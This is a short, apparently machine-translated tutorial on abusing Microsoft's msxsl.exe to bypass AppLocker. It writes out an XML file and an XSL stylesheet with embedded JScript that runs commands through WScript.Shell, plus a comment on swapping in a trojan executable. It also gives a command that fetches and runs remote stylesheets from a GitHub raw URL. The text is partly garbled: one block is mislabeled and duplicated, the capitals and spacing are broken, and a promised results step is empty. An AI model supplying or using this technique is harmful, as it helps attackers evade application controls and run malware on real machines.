1. Need to use Microsoft Tools Msxsl.exe,msxsl.exe is a program that Microsoft uses to process XSL under command line, so through him we can execute JavaScript and execute system commands, which are:
https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714
2. Executing the tool requires 2 files, respectively, XML and XSL files, with the following commands:
Msxsl.exe Test.xml exec.xsl
Test.xml:
<?xml version= "1.0"? ><?xml-stylesheet type= "text/xsl" href= "exec.xsl"? ><customers><customer ><name>Microsoft</name></customer></customers>
EXEC.XCL:
<?xml version= "1.0"? ><?xml-stylesheet type= "text/xsl" href= "exec.xsl"? ><customers><customer ><name>Microsoft</name></customer></customers>
Exec.xsl
<?xml version= ' 1.0 '? ><xsl:stylesheet version= "1.0" xmlns:xsl= "Http://www.w3.org/1999/XSL/Transform" xmlns : msxsl= "Urn:schemas-microsoft-com:xslt" xmlns:user= "Http://mycompany.com/mynamespace" > <msxsl:script Language= "JScript" implements-prefix= "user" > function XML (nodelist) {var r = new ActiveXObject ("Wscript.Shell" ). Run ("cmd/c calc.exe");//This can be retrofitted to execute your Trojan file such as://var r = new ActiveXObject ("Wscript.Shell"). Run ("cmd/k CD C: \ & Shell.exe"); Return Nodelist.nextnode (). xml; } </msxsl:script><xsl:template match= "/" > <xsl:value-of select= "User:xml (.)" /></xsl:template></xsl:stylesheet>
3. The results of the final implementation are:
4. Can also be executed remotely:
Msxsl.exe Https://raw.githubusercontent.com/backlion/demo/master/test.xml https://raw.githubusercontent.com/ Backlion/demo/master/exec.xsl
Using MSXSL.exe to bypass AppLocker application control policies